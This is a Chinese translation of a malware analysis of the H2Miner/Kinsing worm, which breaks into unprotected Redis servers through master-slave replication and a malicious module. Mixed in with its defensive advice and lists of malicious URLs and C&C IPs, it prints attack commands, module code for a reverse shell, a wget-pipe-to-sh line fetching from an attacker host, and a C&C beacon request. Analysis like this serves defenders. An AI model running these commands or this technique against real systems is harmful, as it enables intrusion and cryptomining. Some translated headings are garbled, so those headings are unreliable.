一天前,我專案的一台伺服器受到了類似蠕蟲病毒的攻擊。尋找「那是什麼?」這個問題的答案。我發現阿里雲安全團隊寫的一篇很棒的文章。由於我沒有找到 Habré 的這篇文章,所以我決定專門為您翻譯<3
條目
近日,阿里雲安全團隊發現H2Miner突然爆發。此類惡意蠕蟲利用Redis缺乏授權或弱口令作為進入您系統的網關,透過主從同步的方式將自身的惡意模組與從機同步,最終將該惡意模組下載到被攻擊機器上並執行惡意程式碼指示。
過去,對您的系統的攻擊主要是使用排程任務或攻擊者登入 Redis 後寫入您的電腦的 SSH 金鑰的方法進行的。幸運的是,由於權限控制問題或由於系統版本不同,這種方法不能經常使用。然而,這種載入惡意模組的方法可以直接執行攻擊者的命令或取得shell的存取權限,這對您的系統來說是危險的。
由於網路上託管大量Redis伺服器(近1萬台),阿里雲安全團隊友情提醒,建議用戶不要在線共享Redis,並定期檢查密碼強度以及是否被洩露。快速選擇。
H2礦工
H2Miner 是一個針對基於 Linux 的系統的挖礦殭屍網絡,它可以透過多種方式入侵您的系統,包括 Hadoop Yarn 缺乏授權、Docker 和 Redis 遠端命令執行 (RCE) 漏洞。殭屍網路的工作原理是下載惡意腳本和惡意軟體來挖掘您的資料、水平擴展攻擊並維持命令和控制 (C&C) 通訊。
Redis 遠端執行
Pavel Toporkov 在 ZeroNights 2018 上分享了這方面的知識。在 4.0 版本之後,Redis 支援插件載入功能,使用戶能夠將 C 編譯的 so 檔案載入到 Redis 中,以執行特定的 Redis 命令。雖然功能有用,但包含一個漏洞,在主從模式下,檔案可以透過 fullresync 模式與從機同步。攻擊者可以利用它來傳輸惡意so檔案。傳輸完成後,攻擊者將模組載入到被攻擊的Redis實例上並執行任意命令。
惡意軟體蠕蟲分析
近日,阿里雲端安全團隊發現H2Miner惡意礦工群體規模突然大幅成長。根據分析,攻擊發生的大致流程如下:
H2Miner 使用 RCE Redis 進行全面攻擊。攻擊者首先攻擊未受保護的Redis伺服器或密碼較弱的伺服器。
然後他們使用命令 config set dbfilename red2.so 更改檔案名稱。之後,攻擊者執行命令 slaveof 設定主從複製主機位址。
當被攻擊的Redis實例與攻擊者擁有的惡意Redis建立主從連接時,攻擊者使用fullresync命令發送受感染的模組來同步檔案。然後 red2.so 檔案將被下載到被攻擊的機器上。然後攻擊者使用./red2.so載入模組來載入這個so檔。此模組可以執行攻擊者的命令或發動反向連線(後門)以存取受攻擊的機器。
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
執行惡意命令後,例如 / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1之後,攻擊者會重置備份檔案名稱並卸載系統模組來清理痕跡。但是,red2.so 檔案仍會保留在受攻擊的電腦上。建議使用者註意其 Redis 實例的資料夾中是否存在此類可疑檔案。
攻擊者除了殺死一些惡意進程來竊取資源外,還透過下載並執行惡意二進位檔案來追蹤惡意腳本 。這表示主機上包含kinsing的進程名稱或目錄名稱可能表示該機器已被該病毒感染。
根據逆向工程結果,此惡意軟體主要執行以下功能:
- 上傳文件並執行它們
- 礦業
- 維持C&C通訊並執行攻擊者命令
使用masscan進行外部掃描,擴大你的影響力。另外,程式中硬編碼了C&C伺服器的IP位址,被攻擊主機將透過HTTP請求與C&C通信伺服器進行通信,其中殭屍(受感染伺服器)資訊在HTTP標頭中標識。
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
其他攻擊方式
蠕蟲使用的地址和鏈接
/金辛
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
施恩茨
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
評議會
首先,Redis 不應該從 Internet 訪問,並且應該使用強密碼進行保護。同樣重要的是,客戶端檢查 Redis 目錄中沒有 red2.so 文件,且主機上的文件/進程名稱中沒有「kinsing」。
來源: www.habr.com